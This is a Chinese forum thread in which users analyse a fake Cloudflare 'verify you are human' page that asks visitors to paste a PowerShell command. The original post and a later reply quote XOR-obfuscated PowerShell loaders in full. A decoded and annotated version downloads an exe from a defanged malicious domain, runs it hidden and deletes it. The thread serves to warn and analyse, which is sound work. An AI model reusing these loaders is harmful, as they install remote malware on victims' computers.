一个加密的powershell脚本,下载了一个exe可执行文件

晓枫灬殘月/qq · 发表于 2026-4-22 15:19

一个好像被劫持了的网址是：hxxps://kkpower.com.pk进去后页面会提示人类验证，但是我从没见过需要用终端验证的

终端输入的的代码是一段加密的文本：
<# I am not a robot - Cloudflare ID: 89d1675ca9d2166a #> $k='UbTHcw';$d='710b262d121d385f7313300e261631254d3930167a1b0605230b372d33183c0c200502193405313a3e4d6f31312b16053c162d181118210d37270f4a0e312d3b1712384c1a2d17590607373d111e211b043a0c033a013b24370e2507097259233911657a5853215f1e270a197832353c0b5771073a3e5923102f04684b2c061b273c061a7b2b1b663316210a09725930301606290d133a0f12210f121b03392d4b5e7c591a2d145a1c163125435a1c163125370e2507740c0a0530012027110e754f0429171f754620684e313a10372d1f3820167906161b3959702e5e3d3a0b3a653316210a746c17577d3907311003300f7a012c59050320203e4d6f25313c31163b063b25251e39071a290e127d4b7f6f4459301a316f445e6e463b235e476e043b3a4b533c5f6473471e754f383c4344754f35260757780c3b3c43533a096f6c0a5c7e4b2f3c110e2e2b3a3e0c1c304f032d01253013212d1003754f013a0a5772453c3c170726587b670d123b033027131625037a2b05137a0324214c1e3b0631304d073d126b295e133944202708123b5f307802423051367d524636506d7b51476356607002146156607d52156d55327f52403300302e02473650327154456150647051153150327a5a40615a357c5b417311262b5e1c3e123b3f06057b013b254d073e4439270712680138271613330e353a0650724279071603130b382d43533342791d1012170327210027341027210d106e0b326037122616791802033d42702e4a0c710d3f75520a300e272d18242103263c4e2439073138435a060737270d13264266351e143416372018242103263c4e2439073138435a060737270d13264266351e4c3c047c650d1821427c1c0604214f0429171f754632614a0c301a3d3c1e4c0616353a175a05103b2b06042642790e0a1b3032353c0b5771047465341e3b063b3f30032c0e31682b1e310631265803271b2f1a061a3a1431652a03300f74652f1e210726290f2734163c684711754f122711143042790d11053a10152b171e3a0c741b0a1b300c20241a343a0c20210d02301f372917143d192973444c0616353a175a05103b2b06042642791f0a19310d231b170e390774000a1331073a6813182207263b0b12390e746522053217392d0d03190b273c4350782c3b181118330b382d445b724f03210d133a15073c1a1b3045786f2b1e31063126445b724f17270e1a340c306f4f533c103139091a6e072c2117';$r='';for($p=0;$p -lt $d.Length;$p+=2){$r+=[char](([convert]::ToInt32($d.Substring($p,2),16))-bxor[int][char]$k[$p/2%$k.Length])};&([ScriptBlock]::Create($r))

我解密后得到了原本的指令：

[Asm] 纯文本查看 复制代码

[System.Net.ServicePointManager]::SecurityProtocol=[System.Net.SecurityProtocolType]::Tls12;
$t=Join-Path $env:TEMP ([System.IO.Path]::GetRandomFileName());
New-Item -ItemType Directory -Path $t -Force|Out-Null;
$f=Join-Path $t ([System.IO.Path]::GetRandomFileName()+'.exe');
$ok=0;
for($i=0;$i -lt 3 -and -not $ok;$i++){
    try{
        Invoke-WebRequest -Uri '[color=#ff0000]hxxps://nenadopapa.cfd/api/index.php[/color]?a=dl&token=d0a5e3b511c293206448ac44451b87f717fbdfa0c2f97242082bd2f29748a486&src=kkpower.com.pk&mode=cloudflare' -OutFile $f -UseBasicParsing;
        if(Test-Path $f){$ok=1}else{Start-Sleep -Seconds 2}
    }catch{Start-Sleep -Seconds 2}
};
if(-not (Test-Path $f)){exit};
Start-Process -FilePath $f -WindowStyle Hidden;
try{Remove-Item -LiteralPath $f -Force -ErrorAction SilentlyContinue}catch{};

这玩意儿执行完后我的浏览器直接闪退崩溃了，而且一直打不开，重启电脑后才行。
指令中的地址，会下载一个update.exe的文件，但是存放在临时目录了，我重启电脑后它就不见了
大佬可否帮我看看这个update.exe是干啥的么，如果是恶意程序的话，咋能处理掉它。

邪汐 · 发表于 2026-4-22 16:19

这个不久前看见过，貌似是一串木马，但是忘记了有无解决办法，可以问问其他大佬，这个木马好像还藏得深
再次提醒，人机验证没有需要终端执行的，需要就是钓鱼网站

地球守护者 · 发表于 2026-4-22 16:25

楼层主人，CF网站验证，正常没有图像问题，另外，重新启动Windows，删除Update.exe，目的就是，防御阻止逆转方向查看应用程序代码，和熊猫烧香病毒应用程序一个样子，虽然保存加密格式信息，但是，也是自动删除加密文件，导致无法寻找重要内容

邪汐 · 发表于 2026-4-22 16:34

邪汐发表于 2026-4-22 16:19
这个不久前看见过，貌似是一串木马，但是忘记了有无解决办法，可以问问其他大佬，这个木马好像还藏得深
再 ...

楼主帮你ai了一下，你可以使用ai指导你进行清理，可以用deep，先断网再高清图的，实在不行就重装系统

dhajjdg543 · 发表于 2026-4-22 17:26

杀毒改密码，踢登录设备呗，还能怎么办

zchld · 发表于 2026-4-22 21:46

# 1. 强制启用 TLS 1.2 网络协议，确保能正常连接恶意服务器
[System.Net.ServicePointManager]::SecurityProtocol=[System.Net.SecurityProtocolType]::Tls12;

# 2. 在系统临时目录（C:\Users\XXX\AppData\Local\Temp）生成一个随机名称的临时文件夹
$t=Join-Path $env:TEMP ([System.IO.Path]::GetRandomFileName());

# 3. 创建这个临时文件夹（静默创建，不显示输出）
New-Item -ItemType Directory -Path $t -Force|Out-Null;

# 4. 在临时文件夹里生成一个随机名称.exe 的可执行文件路径
$f=Join-Path $t ([System.IO.Path]::GetRandomFileName()+'.exe');

# 5. 定义下载成功标记，初始为失败
$ok=0;

# 6. 最多重试 3 次下载，成功就停止
for($i=0;$i -lt 3 -and -not $ok;$i++){
try{
      # 核心高危：从恶意域名下载文件，保存到临时exe
      Invoke-WebRequest -Uri 'hxxps://nenadopapa.cfd/api/index.php?a=dl&token=d0a5e3b511c293206448ac44451b87f717fbdfa0c2f97242082bd2f29748a486&src=kkpower.com.pk&mode=cloudflare' -OutFile $f -UseBasicParsing;

      # 判断是否下载成功
      if(Test-Path $f){$ok=1}else{Start-Sleep -Seconds 2}
}catch{Start-Sleep -Seconds 2} # 下载失败等待2秒重试
};

# 7. 如果没下载成功，直接退出，不做操作
if(-not (Test-Path $f)){exit};

# 8. 【最危险】后台静默运行下载的exe文件，无窗口、用户完全看不见
Start-Process -FilePath $f -WindowStyle Hidden;

# 9. 尝试删除下载的exe文件（销毁痕迹）
try{Remove-Item -LiteralPath $f -Force -ErrorAction SilentlyContinue}catch{};

ahua0597 · 发表于 2026-4-22 23:44

我遇到了类似的：

<# Verification code: 549D16169D78 #> $w23='LZC641';$x24='682c7b4c5b032967646d67483f2e265b1a7f292e6d6551433a332053645e2534377b555f2d3d2644690b760926554143252e3a66465e38352059580c17093a45405421740d53401f1f3f20434658382313445b4523392c5a60483c3f1e0c0e65202972040f152f697e7c5b582277135740596c7e2658420b181f0e66141917093a45405421740a791a612d2e2b6b0e0b0b3f3764555f28352e705d5d2914225b5119657378785146611337535911611337535965352a261670583e3f20425b43357a6e665545247a67550711611c2c44575430153642197f39362f0d1055786709595d5f610a22425c11683970161c6a1f233042515c62130c18645038321e0c0e76292e11575a552337055f5854023b2e531c18677d64185149297d641f0f15296f7e060f5723286b125207716a781252076c772f4214026c772258501161342c421415296f7812520767716a4d404335210a58425e273f6e6151531e3f32435142387a6e6346586c7d645e40453c2979191b5b25392a5842543f2e2e535a453f742e595a42383f3119554125752a5850543474335e440e2d67275a12452331265809542a6e250755097d39715557527f387a0105037e6d71040602796a76040701746a250f05572a3b250405557c3b200406027c63735752527a3b275201042e68701047432f67315357503c2e205e55172f387e535056297c3153520c242e374647147f1b660472147e1c2f5f4254273f3a4544502f3f6d5b5b5f3f2e264411030a7c2e59505471282655554138392b5713166c770c434077253626161055787a6e6347540e3b305f57612d28305f5a567733251e60543f2e6e665545247a67520018377e26030900313f2f45514a1f2e2244401c1f3626534411610926555b5f28296304494c2f3b37555c4a1f2e2244401c1f3626534411610926555b5f28296304494c7733251e195f232e631e60543f2e6e665545247a675200186521264e5d45316110425543387713445b52292930161977253626665545247a67520011610d2a58505e3b09374f58546c122a525054226137444d4a1e3f2e59425461133753591161162a4251432d36135740596c7e2702141c0a3531555111611f31445b430d39375f5b5f6c092a5a515f38363a755b5f38332d43514c2f3b37555c4a3161640d67452d28371b6443233926454711610d2a58505e3b09374f58546c122a525054227a335943543e292b53585d6c7702445344213f2d4278583f2e6311197f230a31595258203f641a131c1b332d525b461f2e3a5a5116607d0b5f50552934641a131c0f352e5b555f287d6f124209363571530f54343337';$y25='';for($z26=0;$z26 -lt $x24.Length;$z26+=2){$y25+=[char](([convert]::ToInt32($x24.Substring($z26,2),16))-bxor[int][char]$w23[$z26/2%$w23.Length])};iex $y25

帐号		自动登录	找回密码
密码			注册[Register]

一个加密的powershell脚本,下载了一个exe可执行文件

免费评分

浏览过的版块